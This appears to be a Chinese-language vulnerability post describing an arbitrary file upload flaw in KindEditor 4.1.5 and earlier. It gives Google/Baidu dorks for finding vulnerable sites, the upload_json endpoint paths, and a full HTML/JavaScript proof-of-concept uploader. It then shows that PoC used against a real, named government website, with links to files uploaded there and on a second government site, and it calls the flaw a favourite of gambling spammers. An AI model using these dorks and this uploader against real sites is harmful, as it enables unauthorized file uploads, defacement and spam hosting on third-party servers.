<p>漏洞描述</p><p>漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net</p><p>漏洞存在于小于等于kindeditor4.1.5编辑器中</p><p>关键字:</p><p> allinurl:/examples/uploadbutton.html</p><p> allinurl:/php/upload_json.php / .asp / .jsp</p><p>根本脚本语言自定义不同的上传地址,上传之前有必要验证文件upload_json.*的存在</p><p>/asp/upload_json.asp</p><p>/asp.net/upload_json.ashx</p><p>/jsp/upload_json.jsp</p><p>/php/upload_json.php</p><p>poc:<br></p><p><font color="#e33737"><html><head></font></p><p><font color="#e33737"><title>Uploader By ICE</title></font></p><p><font color="#e33737"><script src="http://[Target]/kindeditor/kindeditor-min.js"></script></font></p><p><font color="#e33737"><script></font></p><p><font color="#e33737">KindEditor.ready(function(K) {</font></p><p><font color="#e33737">var uploadbutton = K.uploadbutton({</font></p><p><font color="#e33737">button : K('#uploadButton')[0],</font></p><p><font color="#e33737">fieldName : 'imgFile',</font></p><p><font color="#e33737">url :...
<p>漏洞描述</p><p>漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net</p><p>漏洞存在于小于等于kindeditor4.1.5编辑器中</p><p>关键字:</p><p> allinurl:/examples/uploadbutton.html</p><p> allinurl:/php/upload_json.php / .asp / .jsp</p><p>根本脚本语言自定义不同的上传地址,上传之前有必要验证文件upload_json.*的存在</p><p>/asp/upload_json.asp</p><p>/asp.net/upload_json.ashx</p><p>/jsp/upload_json.jsp</p><p>/php/upload_json.php</p><p>poc:<br></p><p><font color="#e33737"><html><head></font></p><p><font color="#e33737"><title>Uploader By ICE</title></font></p><p><font color="#e33737"><script src="http://[Target]/kindeditor/kindeditor-min.js"></script></font></p><p><font color="#e33737"><script></font></p><p><font color="#e33737">KindEditor.ready(function(K) {</font></p><p><font color="#e33737">var uploadbutton = K.uploadbutton({</font></p><p><font color="#e33737">button : K('#uploadButton')[0],</font></p><p><font color="#e33737">fieldName : 'imgFile',</font></p><p><font color="#e33737">url : 'http://[Target]/kindeditor/php/upload_json.asp?dir=file',</font></p><p><font color="#e33737">afterUpload : function(data) {</font></p><p><font color="#e33737">if (data.error === 0) {</font></p><p><font color="#e33737">var url = K.formatUrl(data.url, 'absolute');</font></p><p><font color="#e33737">K('#url').val(url);}</font></p><p><font color="#e33737">},</font></p><p><font color="#e33737">});</font></p><p><font color="#e33737">uploadbutton.fileBox.change(function(e) {</font></p><p><font color="#e33737">uploadbutton.submit();</font></p><p><font color="#e33737">});</font></p><p><font color="#e33737">});</font></p><p><font color="#e33737"></script></head><body></font></p><p><font color="#e33737"><div class="upload"></font></p><p><font color="#e33737"><input class="ke-input-text" type="text" id="url" value="" readonly="readonly" /></font></p><p><font color="#e33737"><input type="button" id="uploadButton" value="Upload" /></font></p><p><font color="#e33737"></div></font></p><p><font color="#e33737"></body></font></p><p><font color="#e33737"></html></font></p><p><br></p><p>演示:</p><p>首先,百度了一下关键字,得到一个结果<font color="#e28b41"><a href="http://www.tedala.gov.cn" rel="nofollow">http://www.tedala.gov.cn</a></font>,发现<br></p><p>inurl:gov.cn/kindeditor</p><p><img data-image-size="1169,683" src="https://images.seebug.org/contribute/8625954f-367c-414d-b68e-44719a128cfd-QQ截图20150921095450.png" alt="QQ截图20150921095450.png"><br></p><p>查看是window服务器,猜测是asp.net</p><p><img data-image-size="544,172" src="https://images.seebug.org/contribute/3d6f43bc-6536-402f-8e94-1fd8de3ca19a-QQ截图20150921095558.png" alt="QQ截图20150921095558.png"></p><p>写出下面的构造上传poc<br></p><p><font color="#e28b41"><html><head></font></p><p><font color="#e28b41"><title>Uploader By ice</title></font></p><p><font color="#e28b41"><script src="<a href="http://www.tedala.gov.cn/kindeditor/kindeditor.js" rel="nofollow">http://www.tedala.gov.cn/kindeditor/kindeditor.js</a>"></script></font></p><p><font color="#e28b41"><script></font></p><p><font color="#e28b41">KindEditor.ready(function(K) {</font></p><p><font color="#e28b41">var uploadbutton = K.uploadbutton({</font></p><p><font color="#e28b41">button : K('#uploadButton')[0],</font></p><p><font color="#e28b41">fieldName : 'imgFile',</font></p><p><font color="#e28b41">url : '<a href="http://www.tedala.gov.cn/kindeditor/asp.net/upload_json.ashx?dir=file" rel="nofollow">http://www.tedala.gov.cn/kindeditor/asp.net/upload_json.ashx?dir=file</a>',</font></p><p><font color="#e28b41">afterUpload : function(data) {</font></p><p><font color="#e28b41">if (data.error === 0) {</font></p><p><font color="#e28b41">var url = K.formatUrl(data.url, 'absolute');</font></p><p><font color="#e28b41">K('#url').val(url);}</font></p><p><font color="#e28b41">},</font></p><p><font color="#e28b41">});</font></p><p><font color="#e28b41">uploadbutton.fileBox.change(function(e) {</font></p><p><font color="#e28b41">uploadbutton.submit();</font></p><p><font color="#e28b41">});</font></p><p><font color="#e28b41">});</font></p><p><font color="#e28b41"></script></head><body></font></p><p><font color="#e28b41"><div class="upload"></font></p><p><font color="#e28b41"><input class="ke-input-text" type="text" id="url" value="" readonly="readonly" /></font></p><p><font color="#e28b41"><input type="button" id="uploadButton" value="Upload" /></font></p><p><font color="#e28b41"></div></font></p><p><font color="#e28b41"></body></font></p><p><font color="#e28b41"></html></font></p><p><br></p><p>用火狐浏览器40.0.3版本打开,<br></p><p><img data-image-size="1428,591" src="https://images.seebug.org/contribute/13b74fcc-442e-4a97-b1ad-155118a726da-QQ截图20150921094935.png" alt="QQ截图20150921094935.png"></p><p><img data-image-size="1123,542" src="https://images.seebug.org/contribute/5a8dc3af-25df-45f6-829c-064fa76de9d3-QQ截图20150921095929.png" alt="QQ截图20150921095929.png"><br></p><p><img data-image-size="386,368" src="https://images.seebug.org/contribute/a0b1b01a-30b5-4882-bcb5-83cb9494acc3-QQ图片20150921101337.png" alt="QQ图片20150921101337.png"></p><p>菠菜的最爱</p><p>针对可以上传格式,有些可以看到:还可以上传docx.xls.xlsx.ppt.htm.zip.rar.gz.bz2</p><p><img data-image-size="825,185" src="https://images.seebug.org/contribute/60be21fb-cd8f-47c6-bf09-79f8db574d02-QQ图片20150921101656.png" alt="QQ图片20150921101656.png"><br></p><p><br></p><p><a href="http://www.tedala.gov.cn//kindeditor/attached/file/20150921/20150921092857_7645.html" rel="nofollow">http://www.tedala.gov.cn//kindeditor/attached/file/20150921/20150921092857_7645.html</a></p><p><a href="http://www.lsland.gov.cn/kindeditor/attached/file/20150909/20150909225913_1180.htm" rel="nofollow">http://www.lsland.gov.cn/kindeditor/attached/file/20150909/20150909225913_1180.htm</a><br></p>
